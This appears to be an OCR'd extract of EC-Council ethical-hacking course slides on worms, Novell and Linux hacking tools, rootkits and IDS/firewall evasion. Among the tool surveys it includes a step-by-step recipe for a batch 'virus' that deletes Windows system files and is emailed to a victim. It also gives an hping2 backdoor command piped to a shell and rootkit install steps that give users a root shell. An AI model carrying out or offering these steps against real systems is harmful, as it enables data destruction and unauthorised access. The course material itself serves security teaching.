ElKern, KLAZ, Kletz, I-Worm.klez,
W95/Klez@mm
~W32.Klez variants is a mass
mailing worm that searches the
Windows address book for email
addresses and sends messages to all
the recipients that it finds. The
worm uses its own SMTP engine to
send the messages.
~The subject and attachment name
of the incoming emails are
randomly chosen. The attachment
will have one of the extensions: .bat,
.exe, .pif or .scr.
~The worm exploits a vulnerability
in Microsoft Outlook and Outlook
Express to try execute itself when
you open or preview the message.
EC-Council
SirCam Worm
~SirCam is a mass mailing e-mail
worm with the ability of spreading
through Windows Network shares.
~SirCam sends e-mails with variable
user names and subject fields, and
attaches user documents with double
extensions (such as .doc.pif or
.xls.lnk) to them.
~Thw orm collects a list of files with
certain extensions ('.DOC', '.XLS',
'.ZIP') into fake DLL files named
'sc*.dll'. Thw orm then sends itself
out with one of the document files it
found in a users' "My Documents"
folder.
EC-Council
Nimda Virus
~Nimda is a complex virus with a
mass mailing worm component
which spreads itself in attachments
named README.EXE.
~It affects Windows 95, 98, ME,
NT4 and Windows 2000 users.
~Nimda is the first worm to modify
existing web sites to strt offering
infected files for download. It is also
the first worm to use normal end
user machines to scan for
vulnerable web sites.
~Nimda uses the Unicode exploit to
infect IIS Web servers.
EC-Council
Code Red Worm
~ The "Code Red" worm attempts to connect to TCP port
80 on a randomly chosen host assuming that a web
server will be found.
~ Upon a successful connection to port 80, the attacking
host sends a crafted HTTP GET request to the victim,
attempting to exploit a buffer overflow in the Windows
2000 Indexing Service.
~ If the exploit is successful, the worm begins executing
on the victim host. In the earlier variant of the worm,
victim hosts with a default language of English
experienced the following defacement on all pages
requested from the server:
HELLO! welcome to http://www.worm.com!
Hacked By Chinese!
EC-Council
Writing your own simple virus
~ Step 1: Create a batch file Game.bat with the following
text @ echo off
~ delete c:winntsystem32*.*
~ delete c:winnt*.*
~ Step 2: Convert the Game.bat batch file to Game.com
using bat2com utility.
~ Step 3: Assign Icon to Game.com using Windows file
properties screen.
~ Step 4: Send the Game.com file as an e-mail attachment
to a victim.
~ Step 5: When the victim runs this program, it deletes
core files in WINNT directory making Windows
unusable.
EC-Council
Hacking Tool: Senna Spy Internet
Worm Generator 2000
(http://sennaspy.cjb.net)
This tool can generate a
VBS worm.
An Executable
can be inserted
EC-Council
Anti-Virus Software
~ The only prevention against
virus is to install anti-virus
software and keep the updates
current.
~ Prominent anti-virus software
vendors include:
1. Mc Afee
2. Norton AntiVirus
3. AntiViral Toolkit Pro
4. Dr. Solomon's
5. Trend Micro
6. Command AntiVirus
7. Data Fellows
Virus Encyclopedia resources at Symantec
EC-Council
Summary
~ Viruses come in different forms.
~ Some are mere nuisances some come with devastating
consequences.
~ E-mail worms are self replicating and clogs the
networks with unwanted traffic.
~ Virus codes are not necessarily complex.
~ It is necessary to scan the systems/ networks for
infections on a periodic basis for protection against
viruses.
~ Anti-dotes to new virus releases are promptly made
available by security companies and this forms the
major counter measure.
Ethical Hacking
Module XVII
Novell Hacking
EC-Council
Module Objective
~ Common Accounts and passwords
~ Accessing password files
~ Password crackers
~ Netware hacking tools
– Chknull
– NOVELBFH
– NWPCRACK
– Bindery
– BlnCrack
– SETPWD.NLM
– Kock
– userdump
– Burglar
– Getit
– Spooflog
– Gobbler
– Novelffs
– Pandora
EC-Council
Novell Netware Basics
~ Object Model
~ Access Control Lists
~ Rights
~ Levels of Access
~ Packet Signature
EC-Council
Default Accounts and Settings
~Server Settings
~Supervisor Account
~Default Rights
~RCONSOLE security concerns
~Server Commands and Settings
EC-Council
Valid Account names on Novell
Netware
~ Any limited account should have enough access to allow
you to run SYSCON, located in SYS:PUBLIC directory.
~ If you get in, type SYSCON and enter. Now go to User
Information and you will see all defined accounts.
~ You will not get much info with a limited account, but
you can get the account and the user's full name.
~ If you are IN with any valid account, you can run
USETLST.EXE and get a list of all valid account names
on the server.
EC-Council
Hacking Tool: Chknull.exe
CHKNULL shows you every account with no password
and you do not have to be logged in. For this to work
bindery emulation must be on.
EC-Council
Access the password file in Novell
Netware
~ Access to the password file in the Netware is not like
Unix - the password file is not in the open. All objects
and their properties are kept in the bindery files on the
3.x, and kept in the NDS database in the 4.x.
~ The bindery file attributes (or Flags) in 3.x are hidden
and System, and these files are located on the SYS:
volume in the SYSTEM subdirectory.
~ 3.x - NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS
~ The NET$BVAL.SYS and NET$VAL.SYS are where the
passwords are actually located in 3.x and 4.x
respectively.
EC-Council
Access the password file in Novell
Netware (contd..)
~In Netware 4.x. the files are physically located in
different location than on SYS:volume.
~By using the RCONSOLE utility and using the Scan
Directory option, you can see the files in
SYS:_NETWARE:
~There is another way to view these files and potentially
edit them. After installing NW4 on a NW3 volume, reboot
the server with 3.x SERVER.EXE
~On a volume SYS will be on the _NETWARE directory.
SYS:_NETWARE is hidden better on 4.1 that 4.0x. But in
4.1 you can still see the files by scanning the directory
entry numbers using NCP calls (you need the APIs for
this) using the function 0x17 sub function 0xF3.
EC-Council
Tool: NOVELBFH.EXE &
NWPCRACK.EXE
~ Novelbfh is brute force password cracker which works
on Netware 3.x versions.
~ NWPCRACK is a password cracker that works against a
single account and uses a dictionary wordlist.
EC-Council
Hacking Tool: Bindery.exe &
BinCrack.exe
~ Bindery.exe is a password cracker that works directly
against the .OLD bindery files.
~ This tool extracts user information out of bindery files
into a Unix-style password text file.
~ Then you can use BINCRACK.EXE to "crack" the
extracted text file.
EC-Council
Hacking Tool: SETPWD.NLM
If you have access to the
console, either by
standing in front of it or
by RCONSOLE, you can
use SETSPASS.NLM,
SETSPWD.NLM or
SETPWD.NLM to reset
passwords.
Just load the NLM and
pass it command line
parameters:
How to Use SETPWD.NLM
EC-Council
Other Tools
~ Hacking Tool: Kock
For Netware 3.11, exploits bug in a Netware attached to log in
without a password.
~ Hacking Tool: userdump
UserDump simply lists all users in the Bindery. Works for
Netware 3.x and 4.x (in Bindery Mode)
~ Hacking Tool: NWL
Replacement LOGIN.EXE for Novell Netware. Run PROP.EXE
from a Supervisor account to create a new property.
Replace existing LOGIN.EXE in SYS:LOGIN.
Each time a user logs in, the text is stored in the new property.
Use PROP.EXE to retrieve captured logins.
EC-Council
Hacking Tool: Getit
~ Getit is a hacking tool designed to capture passwords on
a Novell network.
~ This tool is triggered by an instance of the LOGIN.EXE
application used in Novell to authenticate and begin a
login session on a workstation.
~ It works directly at the operating system level,
intercepting calls to Interrupt 21h. It's probably the
most well known NetWare hacking tool ever created.
EC-Council
Hacking Tool: Burglar, SetPass
~ It can only be used where an individual has physical
access to the NetWare File server.
~ The utility is usually stored on a floppy disk. The
attacker sometimes has to reboot the server.
~ SetPass is a loadable module, designed to give the user,
supervisor status.
~ This module also requires physical access to the
machine.
EC-Council
Hacking Tool: Spooflog, Novelffs
http://www.gregmiller.net/novell.html
~ Spooflog is a program, written in C, by Greg Miller, that
can spoof a workstation into believing that it is
communicating with the server.
~ This is a fairly advanced exploit.
~ Novelffs creates a fake file server. It was written by
Donar G E Alofs
~ Needs rebooting after work is done.
EC-Council
Hacking Tool: Gobbler
Gobbler is a hacking tool which 'sniffs' network traffic on
Novell servers.
EC-Council
Hacking Tool: Pandora
~ Pandora is a set of tools for hacking, intruding and
testing the security and insecurity of Novell Netware 4.x
and 5.x. Pandora consists of two distinct sets of
programs - an "online" version and an "offline" version.
~ Features
• Searches for target servers and grabs user accounts without
logging in.
• Multiple DOS attacks and dictionary attacks against user
account
• Attaches to server with password hashes extracted from Offline
program.
• Improved spoofing and hijacking by using real-time sniffing.
Silently 'read' files as they are downloaded from server to client.
EC-Council
Pandora Countermeasure
~ The best protection against this type of attack is
establishing and enforcing a strong password policy.
~ Physical access to all servers should be prevented.
Remote management tools like RCONSOLE over SPX
or RCONj or TCP/IP should not be used.
~ In Netware 5.x environment, screen saver also gives
good protection, because the screen saver requires an
NDS username and password of a user with supervisor
rights to the server to log in.
EC-Council
Summary
~ All parts of the overall NetWare system are objects. Each object in
the security model has an Access Control List, or ACL. Objects are
clustered together in an overall hierarchy. There are a total of five
different levels of access that can be logically defined from the
security model – not logged in, logged in, supervisory access,
administrative access, and console access.
~ NetWare server(<=4.X) by design itself does not offer much in the
way of protection as there is no means of auditing events done at
the console. This is a physical security concern.
~ There is a security concern as the supervisor account password is
the same as the first password for the Admin user until it is
changed using a bindery administration utility.
~ Similar concerns in Novell are exploited by vigilant attackers.
~ Novell Password cracking tools can provide the attackers with
room for further actions.
Ethical Hacking
Module XVIII
Linux Hacking
EC-Council
Module Objective
~ Why Linux?
~ Compiling Programs in Linux
~ Scanning Networks
~ Mapping Networks
~ Password Cracking in Linux
~ SARA
~ TARA
~ Sniffing
~ A Pinger in disguise
~ Session Hijacking
~ Linux Rootkits
~ IP Chains and IP Tables
~ Linux Security Countermeasures
EC-Council
Why Linux?
~ Majority of servers around the globe are running on
Linux / Unix-like platforms
~ Easy to get and Easy on pocket
~ There are many types of Linux-Distributions /Distros /
Flavors such as Red Hat, Mandrake, Yellow Dog,
Debian etc.
~ Source code is available
~ Easy to modify.
~ Easy to develop a program on Linux.
EC-Council
Compiling Programs in Linux
~ There are generally 3 steps to compiling
programs under Linux.
1. Configuring how the program will be complied
2. Compiling the program
3. Installing the program
$ ./configure
$ make
$ su
Password
$ make install
$ exit
EC-Council
Scanning Networks
~ Once the IP address of a target system is known, an
attacker can begin the process of port scanning, looking
for holes in the system through which the attacker can
gain access.
~ A typical system has 2^16 -1 port numbers and one TCP
port and one UDP port for each number.
~ Each one of these ports are a potential way into the
system.
~ The most popular Scanning tool for Linux is Nmap.
EC-Council
Hacking Tool: Nmap
http://www.insecure.org/nmap
~ Stealth Scan, TCP SYN
nmap -v -sS 192.168.0.0/24
~ UDP Scan
nmap -v -sU 192.168.0.0/24
~ Stealth Scan, No Ping
nmap -v -sS -P0 192.168.0.0/24
~ Fingerprint
nmap -v -O 192.168.0.0/24 #TCP
EC-Council
Scanning Networks
~One essential type of tool for
any attacker or defender is the
vulnerability scanner.
~These tool allow the attacker to
connect to a target system and
check for such vulnerabilities as
configuration errors, default
configuration settings that allow
attackers access, and the most
recently reported system
vulnerabilities.
~The preferred open-source tool
for this is Nessus.
~Nessus is an extremely
powerful network scanner. It can
also be configured to run a
variety of attacks.
EC-Council
Cheops
EC-Council
Port scan detection tools
~ Scanlogd - detects and logs TCP port scans.
http://www.openwall.com/scanlogd/
Scanlogd only logs port scans. It does not prevent them.
You will only receive summarized information in the
system's log.
~ Abacus Portsentry
http://www.psionic.com/abacus/portsentry/
Portscan detection daemon Portsentry has the ability to
detect port scans (including stealth scans) on the
network interfaces of your server. Upon alarm it can
block the attacker via hosts.deny, dropped route or
firewall rule.
EC-Council
Password Cracking in Linux
~ Xcrack
(http://packetstorm.linuxsecurity.com/Crackers/)
~ Xcrack doesn't do much with rules.
~ It will find any passwords that match words in the
dictionary file the user provides, but it won't apply any
combinations or modifications of those words.
~ It is a comparatively fast tool.
EC-Council
Hacking Tool: John the Ripper
http://www.openwall.com/john/
~ John the Ripper require the user to have a copy of the
password file.
~ This is a relatively fast password cracker, and the most
popular amongst the hacker community.
Cracking times, using the default dictionaries that come
with the Linux system are as follows:
EC-Council
SARA (Security Auditor's Research
Assistant)
http://www-arc.com/sara
~ The Security Auditor's Research Assistant (SARA) is a
third generation Unix-based security analysis tool that
supports the FBI Top 20 Consensus on Security.
~ SARA operates on most Unix-type platforms including
Linux & Mac OS X
~ SARA is the upgrade of SATAN tool.
~ Getting SARA up and running is a straight forward
compilation process, and the rest is done via a browser.
EC-Council
Sniffit
~ http://reptile.rug.ac.be/^coder/sniffit/sniffit.html
~ Sniffit is one of the most famous and fastest Ethernet
sniffers for Linux.
~ You can run it either on the command line with optional
plug-ins and filters or in interactive mode, which is the
preferred mode.
~ The interactive mode of Sniffit allows you to monitor
connections in real-time and therefore sniff real-time
too!
Note: Remember to download the patch and then
recompile Sniffit, for optimum results!
EC-Council
Hacking Tool: HPing2
http://www.hping.org
~ Hping is a command-line oriented TCP/IP packet
assembly/analyzer.
~ More commonly known for its use as a pinging utility,
HPing carries a hidden but handy usage, that is a
Backdoor Trojan.
~ Just enter the following command on your victim
$ ./hping2 -I eth) -9ecc | /bin/sh
Then Telnet into any port of your victim and invoke
commands remotely on your victim's host by preceding
any Unix/Linux commands with ecc
$ telnet victim.com 80
$ eccecho This Text imitates a trojan shovel
EC-Council
Session Hijacking
~ Using a combination of sniffing and spoofing
techniques, session hijacking tools allow an attacker to
steal a valid, established login session.
~ Examples of such sessions are Telnet and FTP
sessions. With a successful session hijacking attempt,
the victim's login session vanishes and he usually
attributes it to network problems and logs in again.
~ There are generally two types of Session Hijacking
Techniques:
1. Host-Based Session Hijacking
2. Network-Based Session Hijacking
EC-Council
Hacking Tool: Hunt
http://lin.fsid.cvut.cz/^kra/index.html
~ One of Hunt's advantages over other session hijacking tools is that
it uses techniques to avoid ACK storms.
~ Hunt avoids this ACK storm and the dropping of the connection by
using ARP spoofing to establish the attacker's machine as a relay
between Source and Destination.
~ Now the Attacker uses Hunt to sniff the packets the Source and
Destination sends over this connection. The Attacker can choose to
acts as a relay and forward these packets to their intended
destinations, or he can hijack the session.
~ The attacker can type in commands that are forwarded to
Destination but which the Source can't see. Any commands the
Source types in can be seen on the Attacker's screen, but they are
not sent to Destination. Then Hunt allows the attacker to restore
the connection back to the Source when he/she is done with it.
EC-Council
Linux Rootkits
~ One way an intruder can maintain access to a
compromised system is by installing a rootkit.
~ A rootkit contains a set of tools and replacement
executables for many of the operating system's critical
components, used to hide evidence of the attacker's
presence and to give the attacker backdoor access to the
system.
~ Rootkits require root access to install, but once set up,
the attacker can get root access back at any time.
EC-Council
Linux Rootkit v4 (LR4)
~ Linux Rootkit is IV the latest version of a well known trojan package for Linux
system. The rootkit comes with following utility programs and trojaned system
commands: bindshell, chfn, chsh, crontab, du, find, fix, ifconfig, inetd, killall,
linsniffer, login, ls, netstat, oasswd, pidof, ps, rshd, sniffchk, syslogd, tcpd, top,
wted, z2
~ In the example below we will try the change shell command (chsh). Compile only
chsh in chsh-directory and use 'fix' to replace the original with the trojan version.
$ make
gcc -c -pipe -02 -m486 -fomit -frame-pointer -I. -I -
DSBINDER= "" -DUSRSBINDER= "" -DLOGDIR= "" -DVARPATH=
"" chsh.c -o chsh.o
gcc -c -pipe -02 -m486 -fomit -frame-pointer -I. -I -
DSBINDER= "" -DUSRSBINDER= "" -DLOGDIR= "" -DVARPATH=
"" setpwnam.c -o setpwnam.o
gcc -s -N chsh.o setpwnam.o -o chsh
$../fix /usr/bin/chsh ./chsh ../backup/chsh
~ Once done, the chsh command will spawn a root shell to any user who logs on to
the Linux System
EC-Council
Rootkit Countermeasures
chkrootkit is a tool to
locally check for signs of
a rootkit.
It contains chkrootkit, a
shell script that checks
system binaries for
rootkit modification.
http://www.chkrootkit.org/
EC-Council
chkrootkit detects the following
rootkits
EC-Council
Linux Firewall: IPChains
~ IPChains is a very general TCP/IP packet filter, it allows
you to ACCEPT, DENY, MASQ, REDIRECT, or
RETURN packets.
~ There are three chains that are always defined: input,
output and forward.
~ The chain is executed whenever a packet is destined for
a network interface:
• the output chain is executed whenever a packet is exiting a
network interface, destined elsewhere
• the forward chain is executed whenever a packet must traverse
between multiple interfaces
~ Chains are just rule sets that are executed in order,
whenever a packet matches a rule then that specific
target is executed.
EC-Council
IPTables
~ IPTables is the replacement of userspace tool ipchains
in the Linux 2.4 kernel and beyond. IPTables has many
more features than IPChains.
~ Connection tracking capability, i.e. the ability to do
stateful packet inspection.
~ Simplified behavior of packets negotiating the built-in
chains (INPUT, OUTPUT and FORWARD)
~ A clean separation of packet filtering and network
address translation (NAT).
~ Rate-limited connection and logging capability
~ The ability to filter on tcp flag and tcp options, and also
MAC addresses.
EC-Council
Linux Tools: Application Security
~ Whisker (http://www.wiretrip.net)
Rain.Forest.Puppy's excellent CGI vulnerability scanner.
~ Flawfinder (http://www.dwheeler.com/flawfinder/)
Flawfinder is a Python program which searches through souircve code for
potential security flaws, listing potential security flaws sorted by risk, with the
most potentially dangerous flaws shown first. this risk level depends not only on
the function, but on the values of the parameters of the function.
~ StackGuard (hhtp://www.immunix.org)
StackGuard is a compiler that emits programs hardened against "stack smashing"
attacks. Stack smashing attacks are a common form of penetration attack.
Programs that have been compiled with StackGuard are largely immune to stack
smashing attack. Protection requires no source code changes at all.
~ Libsafe (http://www.avayalabs.com/project/libsafe/index.html)
It is generally accepted that the best solution to buffer overflow and format string
attacks is to fix the defective programs.
EC-Council
Linux Tools: Intrusion Detection
Systems
~ Tripwire (http://www.tripwire.com)
A file and directory integrity checker.
~ LIDS (http://www.turbolinux.com.cn/lids/)
The LIDS (Linux Intrusion Detection System) is an intrusion detection
/defense system in the Linux kernel. The goal is to protect Linux systems
disabling some system calls in the kernel itself.
~ AIDE (http://www.cs.tut.fi/^rammer/aide.html)
AIDE (Advanced Intrusion detection Environment) is an Open Source IDS
package.
~ Snort (http://www.snort.org)
Flexible packet sniffer/logger that detects attacks. snort is a libpcap-based
packet sniffer/logger which can be used as a lightweight Network Intrusion
Detection System.
~ Samhain (http://samhain.sourceforge.net)
Samhain is designed for intuitive configuration and tamper-resistance, and
can be configured as a client/server application to monitor many hosts on a
network from a single central location.
EC-Council
Linux Tools: Security Testing Tools
~ NMap (http://www.insecure.org/nmap)
Premier network auditing and testing tool.
~ LSOF (ftp://vic.cc.pudue.edu/pub/tools/unix/lsof)
LSOF lists open files for running Unix/Linux processes.
~ Netcat (http://www.atstake.com/research/tools/index.html)
Netcat is a simple Unix utility which reads and writes data across network
connections, using TCP or UDP protocol.
~ Hping2 (http://www.kyuzz.org/antirez/hping/)
hping2 is a network tool able to send custom ICMP/UDP/TCP packets
and to display target replies like ping does with ICMP replies.
~ Nemesis (http://www.packetninja.net/nemesis/)
The Nemesis Project is designed to be a command-line based, portable
human IP stack for Unix/Linux
EC-Council
Linux Tools: Encryption
~ Stunnel (http://www.stunnel.org)
Stunnel is a program that allows you to encrypt arbitrary TCP
connections inside SSL (Secure Sockets Layer) available on both Unix
and Windows. Stunnel can allow you to secure non-SSL aware
daemons and protocols (like POP, IMAP, NNTP, LDAP, etc) by having
Stunnel provide the encryption, requiring no changes to daemon's
code.
~ OpenSSH /SSH (http://www.openssh.com/)
SSH (Secure Shell is a program for logging into a remote machine and
for executinmg commands on a remote machine. It provides secure
encrypted communications between two untrusted hosts over an
insecure network.
~ GnuPG (http://www.gnupg.org)
GnuPG is a complete and free replacement for PGP. Since it does not
use the patented IDEA algorithm, it can be used without any
restrictions.
EC-Council
Linux Tools: Log and Traffic Monitors
~ MRTG (http://www.mrtg.org)
The Multi-Router Traffic Grapher (MRTG) is a tool to monitor the
traffic load on network-links.
~ Swatch (http://www.stanford.edu/^atkins/swatch/)
Swatch, the simple watch daemon is a program for Unix system
logging.
~ Timbersee http://www.fastcoder.net /^thumper/software/
sysadmin/ timbersee/)
Timbersee is a program very similar to the Swatch program.
~ Logsurf (http://www.cert.dfn.de/eng/logsurf/)
The program log surfer was designed to monitor any text-based
logfiles on the system in realtime.
~ TCP Wrappers (ftp://ftp.prcupine.org/pub/security/index.html)
Wietse Venema's network logger, also known as TCPD or LOG_TCP.
These programs log the client hostname of incoming telnet, ftp, rsh,
rlogin, finger etc. requests.
EC-Council
Linux Tools: Log and Traffic Monitors
~ IPLog (http://ojnk.sourceforge.net/)
iplog is a TCP?IP traffic logger. Currently, it is capable of logging
TCP, UDP and ICMP traffic.
~ IPTraf (http://cebu.mozcom.com/riker/iptraf/)
IPTraf is an ncurses based IP LAN monitor that generates various
network statistics including TCP info, UDP counts, ICMP and
OSPF information, Ethernet load info, node stats, IP checksum
errors and others.
~ Ntop (http://www.ntop.org)
ntop is a Unix/Linux tool that shows the network usage, similar to
what the popular "top" Unix/Linux command does.
EC-Council
Linux Security Countermeasures
EC-Council
Summary
~ Linux is gaining popularity and is fast becoming a stable industry
strength OS.
~ Once the IP address of a target system is known, an attacker can
begin port scanning, looking for holes in the system for gaining
access. Nmap being a popular tool.
~ Password cracking tools are available for Linux as well.
~ Sniffers as well as Packet assembly/analyzing tools for Linux
provide attackers with the edge that they have dealing with other
OSs.
~ Attackers with root privileges can engage in session hijacking as
well.
~ Trojans, backdoors, worms are also prevalent in the Linux
environment.
~ As with any other system, a well developed integrated procedure is
to be put in place to counter the threats that exist.
Ethical Hacking
Module XIX
Evading IDS, Firewalls
and Honey pots
EC-Council
Module Objective
~ Intrusion Detection System
~ System Integrity Verifiers
~ How are Intrusions Detected?
~ Anomaly Detection
~ Signature Recognition
~ How does an IDS match Signatures with incoming
Traffic?
~ Protocol Stack Verification
~ Application Protocol Verification
~ Hacking Through Firewalls
~ IDS Software Vendors
~ Honey Pots
EC-Council
Intrusion Detection Systems (IDS)
~ Intrusion Detection Systems (IDS) monitors packets on
the network wire and attempts to discover if a
hacker/hacker is attempting to break into a system (or
cause a denial of service attack).
~ A typical example is a system that watches for large
number of TCP connection requests (SYN) to many
different ports on a target machine, thus discovering if
someone is attempting a TCP port scan.
EC-Council
System Integrity Verifiers (SIV)
~ System Integrity
Verifiers (SIV) monitor
system files to find when
an intruder changes.
~ Tripwire is one of the
popular SIVs.
~ SIVs may watch other
components such as
Windows registry as well
as chron configuration to
find known signatures.
EC-Council
Intrusion Detection
Signature Recognition
~ This means that for every
hacker technique, the
engineers code something
into the system for that
technique.
~ This can be as simple as a
pattern match. The classic
example is to examine
every packet on the wire for
the pattern "/cgi-bin/phf?"
which indicates an attempt
to access this vulnerable
CGI script on a web-server.
Anomaly Detection
~ The idea behind this
approach is to measure a
"baseline" of such stats as
CPU utilization, disk
activity, user logins, file
activity, and so forth.
~ The benefit of this
approach is that it can
detect the anomalies
without having to
understand the underlying
cause behind the
anomalies.
EC-Council
How does an IDS match signatures
with incoming traffic?
~ Traffic consists of IP datagrams flowing across
a network.
~ An IDS is able to capture those packets as they
flow by on the wire.
~ An IDS consists of a special TCP/IP stack that
reassembles IP datagrams and TCP streams. It
then applies some of the following techniques:
• Protocol stack verification
• Application protocol verification
• Creating new loggable events
EC-Council
Protocol Stack Verification
~ A number of intrusions,
such as "Ping -O-Death"
and "TCP Stealth
Scanning" use violations
of the underlying IP,
TCP, UDP and ICMP
protocols in order to
attack the machine.
~ A simple verification
system can flag invalid
packets. This can include
valid, by suspicious,
behavior such as
severally fragmented IP
packets.
EC-Council
Application Protocol Verification
~ A number of intrusions use invalid protocol behavior,
such as “WinNuke”, which uses NetBIOS protocol
(adding OOB data or DNS cache poisoning, which has a
valid but unusual signature.
~ In order to effectively detect these intrusions, an IDS
must re- implement a wide variety of application-layer
protocols in order to detect suspicious or invalid
behavior.
EC-Council
What happens after an IDS detects an
attack?
1. Configure firewall to filter out the IP address of the intruder.
2. Alert user / administrator (sound / e-mail / Page).
3. Write an entry in the event log. Send an SNMP Trap datagram
to a management console like HP Openview or Tivoli.
4. Save the attack information (timestamp, intruder IP address,
Victim IP address/port, protocol information).
5. Save a tracefile of the raw packets for later analysis.
6. Launch a separate program to handle the event
7. Terminate the TCP session - Forge a TCP FIN packet to force a
connection to terminate.
EC-Council
IDS Software Vendors
~ Black ICE by Network ICE (http://www.networkice.com)
~ CyberCop Monitor by Network Associates, Inc.
(http://www.nai.com)
~ RealSecure by Internet Security Systems (ISS)
(http://www.iss.net)
~ NetRanger by WheelGroup/Cisco (http://www.wheelgroup.com)
~ eTrust Intrusion Detection by Computer Associates
(http://www.cai.com)
~ NetProwler by Axent (http://www.axent.com)
~ Centrax by Cybersafe (http://www.cybersafe.com)
~ NFR by Network Flight Recorder (http://www.nfr.net)
~ Dragon by Security Wizards (http://www.network-defense.com)
EC-Council
Snort (http://www.snort.org)
~ Snort is an Open Source Intrusion Detection System
~ It contains over thousand signatures. and can be downloaded at
http://www.snort.org/cgi-bin/done.cgi
~ Check out the following example:
In this example of PHF attack detection, a straight text string is
searched for in the app layer
Alert tcp any any -> 192.168.1.0/24 80 (msg: “PHF
attempt” ; content: “/cgi-bin/phf”;)
It gives an alert, that a TCP connection from any IP address and
any port to the 192.168.1.x subnet to port 80.
It searches for the content "/cgi-bin/phf" anywhere in the content.
If it find such content, it will alert the console with a message
"PHF attempt"
EC-Council
Evading IDS Systems
~ Many simple network intrusion detection systems rely
upon "pattern matching".
~ Attack scripts have well known patterns, so simply
compiling a database of the output of known attack
scripts provide pretty good detection, but can easily be
evaded by simply changing the script.
~ IDS evasion focuses on foiling signature matching by
altering an attacker' s appearance.
For example, some POP3 servers are vulnerable to a
buffer overflow when a long password is entered. It is
easy to evade simply by changing the attack script.
EC-Council
Complex IDS Evasion
~ An intruder might send a TCP SYN packet that the IDS sees, but
the victim host never sees.
~ This causes the IDS to believe the connection is closed, but when in
fact it is not. Since TCP connections do not send "keep-alives", the
intruder could wait hours or days after this "close" before
continuing the attack.
~ The first attack is to find a way to pass packets as far as the IDS,
and cause a later router to drop packets.
~ This depends upon the router configuration, but typical examples
include low TTL fields, fragmentation, source routing, and other IP
options.
~ If there is a slow link past the IDS, then the hacker can flood the
link with high priority IP packets, and send the TCP FIN as a low
priority packet - the router's queuing mechanism will likely drop
the packet.
EC-Council
Hacking Tool: fragrouter
~ Fragrouter is a program for routing network traffic in
such a way as to elude most network intrusion detection
systems.
~ Fragrouter allows attacks to avoid detection by network
intrusion detection systems.
~ For exmple, the Fragrouter could be used to obfuscate a
phf attack against a web server, a buffer overflow attack
against a DNS server, or any number of other attacks.
fragrouter [ -i interface ] [ -p ] [ ATTACK
] host
EC-Council
Hacking Tool: Tcpreplay
http://sourceforge.net/projects/tcpreplay/
~ Tcpreplay is a set of UNIX tools which allows the
replaying of captured network traffic.
~ It can be used to test a variety of network devices
including routers, firewalls, and NIDS.
tcpreplay [ -i intf ] [ -l loop count ] [
-r rate | -m multiplier ] file ...
EC-Council
Hacking Tool: SideStep.exe
http://www.robertgraham.com/tmp/sidestep.html
~ Sidestep is a hacking tool which evades network IDS in a
completely different manner compared to fragrouter.
EC-Council
Hacking Tool: Anzen NIDSbench
http://www.anzen.com/research/nidsbench/
~ Contains "fragrouter" that forces all traffic to fragment,
which demonstrates how easy it is for hackers/crackers
to do the same in order to evade intrusion detection.
~ This accepts incoming traffic then fragments it
according to various rules (IP fragmentation with
various sizes and overlaps, TCP segmentation again
with various sizes and overlaps, TCP insertion in order
to de-synchronize the connection, etc.)
EC-Council
Hacking Tool: ADMutate
http://www.ktwo.ca/security.html
~ ADMutate accepts a buffer overflow exploit as
input and randomly creates a functionally
equivalent version which bypasses IDS.
~ Once a new attack is known, it usually takes the
IDS vendors a number of hours or days to
develop a signature. But in the case of
ADMutate, it has taken months for signature-
based IDS vendors to add a way to detect a
polymorphic buffer overflow generated by it.
EC-Council
Tools to inject strangely formatted
packets on to the wire
~ Libnet (http://www.packetfactory.net/libnet)
~ Rootshell (http://www.rootshell.com)
~ IPsend (http://www.coombs.anu.edu.au/^avalon)
~ Sun Packet Shell (psh) Protocol Testing Tool
(http://www.playground.sun.com/psh)
~ Net::RawIP (http://www.quake.skif.net/RawIP)
~ CyberCop Scanner’s CASL (http://www.nai.com)
EC-Council
What do I do when I have been
hacked?
~ Incident response team
Set up an "incident response team". Identify those people who
should be called whenever people suspect an intrusion in progress.
~ Response procedure
You need to decide now what your priorities are between network
uptime and intrusion. Can you pull the network plug whenever you
strongly suspect intrusion? Do you want to allow continued
intrusion in order to gather evidence against the intruder?
~ Lines of communication
Do you propagate the information up the corporate food chain
from your boss up to the CEO, Do you inform the FBI or police? Do
you notify partners (vendors/customers)
EC-Council
Hacking through firewalls
~ One of the easiest and most common ways for an
attacker to slip by a firewall is by installing some
network software on an internal system that
communicates using a port address permitted by the
firewall's configuration.
~ A popular port to use is port 53 TCP, normally used by
DNS.
~ Many firewalls permit all traffic using port 53 by
default, because it simplifies firewall configuration and
reduces support calls.
EC-Council
Bypassing Firewall using Httptunnel
~http://www.nocrew.org/software/httptunnel.html
~Httptunnel creates a bidirectional virtual data path
tunneled in HTTP requests. The requests can be sent via an
HTTP proxy if desired so.
EC-Council
Placing Backdoors through Firewalls
The reverse www shell
~ This backdoor should work through any firewall and
allow users to surf the WWW. A program is run on the
internal host, which spawns a child every day at a
special time.
~ For the firewall, this child acts like a user, using his
Netscape client to surf on the internet. In reality, this
child executes a local shell and connects to the www
server operated by the hacker on the internet via a
legitimate looking http request and sends it ready
signal.
~ The legitimate looking answer of the www server
operated by the hacker are in reality the commands the
child will execute on it's machine in the local shell.
EC-Council
